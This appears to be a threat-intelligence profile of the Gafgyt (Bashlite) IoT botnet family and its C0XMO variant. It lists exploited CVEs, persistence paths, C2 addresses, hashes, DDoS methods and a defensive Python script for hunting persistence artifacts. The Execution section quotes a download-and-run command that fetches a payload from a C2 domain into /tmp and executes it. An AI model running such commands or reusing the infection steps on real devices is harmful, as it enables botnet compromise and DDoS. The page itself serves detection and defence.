Gafgyt
Gafgyt, also widely known as Bashlite, is a Linux/IoT botnet malware family used primarily to compromise internet-exposed embedded devices and conscript them into DDoS botnets. The content associates it with aliases including Bashlite, Lizkebab, Torlus, Qbot, Remaiten, and related naming used across overlapping IoT botnet reporting. It is repeatedly described as targeting Linux-based IoT and embedded systems such as routers, cameras, DVRs, and other internet-connected devices, commonly through weak/default credentials, Telnet or SSH brute forcing, and exploitation of known vulnerabilities.
The content specifically describes multiple Gafgyt variants and campaigns. A March 2026 FortiGuard Labs report identified a new Gafgyt variant named C0XMO exploiting CVE-2021-27137, a stack buffer overflow in vulnerable DD-WRT UPnP/SSDP handling reachable via crafted M-SEARCH requests to UDP/1900. In that activity, the malware was downloaded into /tmp/.cache, targeted a Japanese technology company, and was traced to source infrastructure in Germany. C0XMO was compiled for multiple Linux architectures including ARM, MC68000, MIPS R3000, PowerPC, SuperH, Intel 80386/80836, and AMD64, indicating broad cross-platform targeting. The same reporting states that C0XMO used a separate Python scanner/lateral movement component, established persistence by copying itself to hidden paths such as /tmp/.sys, /var/tmp/.sys, /dev/shm/.sys, and optionally $HOME/.sys, set execute permissions, created cron jobs every 15 minutes, modified ~/.profile, ~/.bashrc, and ~/.bash_profile, and could re-execute itself if terminated. It also killed competing malware and removed rival persistence artifacts. After persistence, it connected to C2 85[.]215[.]131[.]70 using a custom handshake and supported heartbeat, scanning, and 19 DDoS methods including UDP, TCP, SYN, NTP amplification, Memcached amplification, ICMP, Ping of Death, HTTP floods, and Cloudflare-bypass HTTP flooding. Its scanner script was fetched from 217[.]160[.]125[.]125:15527 and brute-forced Telnet/SSH, scanned ports including 23, 22, 80, 443, 8080, 5555, 5511, 5554, 4443, 81, 8000, 7547, 8081, 8443, and 8888, exploited multiple HTTP vulnerabilities, and abused exposed ADB services.
Other Gafgyt activity in the content includes exploitation of CVE-2023-1389 in TP-Link Archer AX21 routers, where Fortinet observed a Gafgyt variant among at least six botnet operations abusing the flaw for router compromise and DDoS use. Unit 42 also reported a Gafgyt variant exploiting CVE-2018-9866 in older unsupported SonicWall Global Management System versions shortly after public exploit tooling appeared. That SonicWall-targeting variant was built on the Gafgyt codebase, supported scanner commands for HUAWEI, GPON, D-LINK, and SONICWALL targets, a BIN_UPDATE command for HTTP-based updates, and a BN command for Blacknurse DDoS attacks.
The family is repeatedly tied to DDoS operations. The content places Gafgyt among botnets used in attacks observed during the Russia-Ukraine conflict, with C2s including 172.245.6.134 and 188.127.237.5 targeting Ukrainian government and related sites, and additional Gafgyt infrastructure used against Russian .ru targets. It is also referenced historically in large IoT-botnet-driven DDoS reporting and in abuse of Valve Source Engine ports 27015/27016 for amplification or botnet-related activity.
The content also notes code reuse and ecosystem overlap with other IoT malware. Enemybot is described as using code from both Gafgyt and Mirai. Mozi was initially flagged by many engines as Gafgyt because it reused part of the codebase, though the report states it is distinct. Detection references in the content include Fortinet verdicts such as ELF/Gafgyt.SORA!tr, ELF/Gafgyt.C0MOX!tr, and Python/Gafgyt.C0MOX!tr, as well as generic ELF32 UPX-packing heuristics often associated with Linux botnets including Mirai, Gafgyt, and Tsunami.
High-confidence indicators directly mentioned for the C0XMO variant include infrastructure 85[.]215[.]131[.]70, 217[.]160[.]125[.]125:15527, and 176[.]100[.]37[.]91, along with hashes 444a9d34a9f59dc7975dfabefb47d789813a4497bbac9127c4806dd816e85211, 9394666007fac4014a4641fdae150c1b969ed2bc4299876318a336fd386abf59, 450ea44da0c9d96a2e8f4d6bad34f1c35cd35743295b8cd2defa9f7a9884685d, d452f22dacab9785539484245c13e9cce58df23fc82eeef205684fcd196da20b, 20042f1efb59c99e3addf822a3e9e5a496f0b701362df038a50a32a9f504a136, 7413cbb6eab4d6b10346f71be5dd76d7cf2f4817f7776367b162f83755aefa1f, b6f835ced11059d341222eba11fff3a4672f4de47a3a4d791fad86059a2b06d4, b61a5508847a2167b737d31193dc393e92c5be2aa5141bbe4b7ea6f440fd4799, dff0edae6e8854ddd3e617054ee0bd74c696c91411f704dff60aabaec839bec9, and ea44138b9701fce1b2fe13de8f9e00681c007c9adc625edc9f507f177704c2e8.
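The persistence behaviour attributed to C0XMO above (hidden `.sys` copies, a 15-minute cron job, edits to the shell profile files) gives a defender concrete artifacts to check for. The following Python is an added hunting example, not code from the page or from FortiGuard: the drop paths come from the reporting, while the regexes, the file-existence check and the sample crontab/profile inputs are assumptions constructed here.

```python
"""Hunt for C0XMO-style persistence artifacts on a Linux host (added example)."""
import os
import re

# Hidden drop locations named in the C0XMO reporting; $HOME/.sys is optional there.
HIDDEN_PATHS = ("/tmp/.sys", "/var/tmp/.sys", "/dev/shm/.sys", "/tmp/.cache")
PROFILE_FILES = (".profile", ".bashrc", ".bash_profile")
# A hidden ".sys" path component (file or directory), e.g. /dev/shm/.sys/bot (assumed shape).
HIDDEN_SYS = re.compile(r"(^|/)\.sys(/|\s|$)")
# Cron schedule firing every 15 minutes, e.g. "*/15 * * * *" or "0,15,30,45 * * * *".
CRON_15MIN = re.compile(r"^\s*(\*/15|0,15,30,45)(\s+\*){4}\s+(?P<cmd>.+)$")


def suspicious_cron_lines(crontab_text):
    """Return crontab lines that run every 15 minutes and invoke a hidden .sys path."""
    hits = []
    for line in crontab_text.splitlines():
        m = CRON_15MIN.match(line)
        if m and HIDDEN_SYS.search(m.group("cmd")):
            hits.append(line.strip())
    return hits


def suspicious_profile_lines(profile_text):
    """Return non-comment lines of a ~/.profile, ~/.bashrc or ~/.bash_profile that reference .sys."""
    return [ln.strip() for ln in profile_text.splitlines()
            if not ln.lstrip().startswith("#") and HIDDEN_SYS.search(ln)]


def existing_drop_paths(root="/", home=None):
    """Return the known drop paths (plus $HOME/.sys) that exist under root (root is swappable for tests)."""
    candidates = list(HIDDEN_PATHS)
    if home:
        candidates.append(os.path.join(home, ".sys"))
    return [p for p in candidates if os.path.lexists(os.path.join(root, p.lstrip("/")))]


# Constructed sample inputs (not real captures) showing the pattern the checks look for.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/15 * * * * /tmp/.sys/updater >/dev/null 2>&1
"""
SAMPLE_BASHRC = """\
# ~/.bashrc
alias ll='ls -la'
nohup /var/tmp/.sys/updater >/dev/null 2>&1 &
"""

if __name__ == "__main__":
    print(suspicious_cron_lines(SAMPLE_CRONTAB))
    print(suspicious_profile_lines(SAMPLE_BASHRC))
    print(existing_drop_paths(home=os.environ.get("HOME")))
```

On a real host, feed it the output of `crontab -l` for each user and the contents of the three profile files; a hit on any check is a reason to pull the referenced binary for analysis rather than simply delete it, since the reporting notes the bot re-executes itself when killed.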
Vulnerabilities exploited
16 CVEs Mallory has correlated with this family across public research and vendor advisories.
In March, Labs identified a new Gafgyt botnet variant called C0XMO that spreads by exploiting CVE-2021-27137. The malware is delivered through a stack buffer overflow in vulnerable DD-WRT router firmware, triggered by malicious SSDP M-SEARCH requests sent to UDP port 1900.
The scanner also includes numerous HTTP-based exploits for initial access, including... AVTECH DVR Vulnerability (CVE-2025-34054, CVE-2016-15047)... FortiGuard Labs provides an IPS signature against attacks exploiting... CVE-2016-15047: Avtech DVR Camera Authentication bypass and Command Execution Exploit
The scanner also includes numerous HTTP-based exploits for initial access, including... HNAP SOAP Injection (CVE-2015-2051)... FortiGuard Labs provides an IPS signature against attacks exploiting... CVE-2015-2051: D-Link.Devices.HNAP.SOAPAction-Header.Command.Execution.Vulnerability
The scanner also includes numerous HTTP-based exploits for initial access, including... AVTECH DVR Vulnerability (CVE-2025-34054, CVE-2016-15047)... FortiGuard Labs provides an IPS signature against attacks exploiting... CVE-2025-34054: Avtech DVR Camera Authentication bypass and Command Execution Exploit
The scanner also includes numerous HTTP-based exploits for initial access, including... GLPI htmLawed RCE (CVE-2022-35914)... FortiGuard Labs provides an IPS signature against attacks exploiting... CVE-2022-35914: GLPI-Project.GLPI.htmLawedTest.php.Code.Injection
Tracked as CVE-2023-1389, the flaw is a high-severity unauthenticated command injection problem in the locale API reachable through the TP-Link Archer AX21 web management interface. | Recently, we observed multiple attacks focusing on this year-old vulnerability, spotlighting botnets like Moobot, Miori, the Golang-based agent "AGoent," and the Gafgyt Variant.
The new Gafgyt version targets a newly disclosed vulnerability affecting older, unsupported versions of SonicWall’s Global Management System (GMS). | Some of the commands supported are described in the table below... HUAWEI: Send CVE-2017-17215.
At that time we found that IP hosting samples of Gafgyt containing an exploit for a recently disclosed SonicWall vulnerability (CVE-2018-9866) affecting older, unsupported versions of SonicWall Global Management System (GMS) (8.1 and older). | The new Gafgyt version targets a newly disclosed vulnerability affecting older, unsupported versions of SonicWall’s Global Management System (GMS).
CVE-2022-22954, a remote code execution (RCE) vulnerability due to server-side template injection in VMware Workspace ONE Access and Identity Manager, is trivial to exploit with a single HTTP request to a vulnerable device.
Botnet attacks aimed at PHP servers involved the exploitation of PHPUnit, Laravel, and ThinkPHP Framework remote code execution flaws, tracked as CVE-2017-9841, CVE-2021-3129, and CVE-2022-47945, respectively.
Widely known Internet of Things device vulnerabilities including the Spring Cloud Gateway RCE, tracked as CVE-2022-22947, the TBK DVR-4104 and DVR-4216 command injection bug, tracked as CVE-2024-3721, and an MVPower DVR misconfiguration were also abused in botnet attacks.
“...most of the malware samples are from well-known malware families like Mirai, Gafgyt and Mozi.”
CVE-2025-55182 is a CVSS 10.0 pre-authentication remote code execution vulnerability with a public Metasploit module. Exploitation requires only a single HTTP POST request... affects React Server Components... The flaw exists in how serialized data is processed, allowing an attacker to send a malicious POST request that the server deserializes and executes without authentication or user interaction.
Techniques & procedures
22 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique
Surveillance cameras in shopping malls are being targeted to form a large botnet... the DDoS attack now peaked at 20,000 requests per second and originated from nearly 900 CCTV cameras running embedded versions of Linux and the BusyBox toolkit.
Initial Access
2 techniques
The crooks made this possible because CCTV camera operators are taking a lax approach to security and their failure to change default passwords on the devices.
The latter model adds a wide variety of infection methods, including brute forcing login credentials on SSH servers and exploiting known security weaknesses in other services.
Execution
2 techniques
The exploit examples repeatedly inject shell commands such as `wget http://l.ocalhost.host/... -O -> /tmp/nemp; sh /tmp/nemp` across targeted devices and applications.
The malware is delivered through a stack buffer overflow in vulnerable DD-WRT router firmware, triggered by malicious SSDP M-SEARCH requests sent to UDP port 1900.
Persistence
1 technique
Privilege Escalation
1 technique
Stealth
1 technique
Credential Access
1 technique
C0XMO exhibits many traits typical of Gafgyt variants, including weak-credential brute-force attacks targeting Telnet and SSH... The scanner performs weak password brute-force attacks on Telnet and SSH services.
Discovery
4 techniques
Each botnet spreads to new hosts by scanning for vulnerable devices in order to install the malware
Continuously scans /proc/ for new processes... For each process: Checks if the binary's realpath contains .anime... Performs memory scanning of /proc/$pid/exe against signatures for known competing botnets...
The bot also actively kills competing botnet processes: mirai, sora, bot, dark, hilix, rakitin, neon, owari, aqua, boatnet, mozi.
Performs memory scanning of /proc/$pid/exe against signatures for known competing botnets: QBOT/Bashlite variants... UPX-packed binaries... Zollard worm... Remaiten...
Lateral Movement
3 techniques
CJ: I scanned the internet with a few sets of default logins for telnet and I was able to upload and execute a binary on 250k devices
In March, Labs identified a new Gafgyt botnet variant called C0XMO that spreads by exploiting CVE-2021-27137.
Unlike earlier variants, C0XMO uses a separate Python script for lateral movement, improving propagation across different devices and architectures.
Command and Control
2 techniques
They use l[.]ocalhost[.]host:47883 as C2... The domain l[.]ocalhost[.]host used for C2 and to serve payloads in the Mirai variant discussed above...
After compromise, the malware was downloaded to the `/tmp/.cache` directory on the affected host.
Impact
6 techniques
issues kill(pid, 9)... unlink() the binary and kill -9 the process... This targets malware that deletes itself after execution...
Mirai, a malware strain that enslaves poorly secured Internet of Things (IoT) devices like wireless routers and security cameras into a botnet for use in large cyberattacks.
These so-called “distributed denial-of-service” (DDoS) attacks are digital sieges in which an attacker causes thousands of hacked systems to hit a target with so much junk traffic that it falls over and remains unreachable by legitimate visitors.
In June 2014, ProxyPipe was hit with a 300 gigabit per second DDoS attack launched by lelddos... Verisign said the 2014 attack was launched by a botnet of more than 100,000 servers running on SuperMicro IPMI boards.
C0XMO supports 19 different DDoS attack methods for various scenarios... UDP Bypass Flood, TCP Flood, Hybrid TCP + UDP Flood, TCP SYN Flood... HTTP Request Storm, Slow/IO Exhaustion, HTTP GET Flood
The most common attack consisted of HTTP GET request floods originating from around 900 CCTV cameras spread around the world.
Other
1 technique
IOCs tracked for this family
100 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
38 sources tracked across advisories, community write-ups, and news.
A botnet malware family referenced as the parent family of the C0XMO variant.
An IoT botnet family known for weak-credential brute-force attacks against Telnet and SSH, command-injection exploitation, and DDoS capabilities. C0XMO is described as a new variant of Gafgyt.
Bashlite is referenced as another likely IoT botnet malware family capable of being used in DDoS attacks against DNS services.
Botnet malware family referenced as historically abusing Valve Source Engine ports for DDoS amplification via A2S query reflection.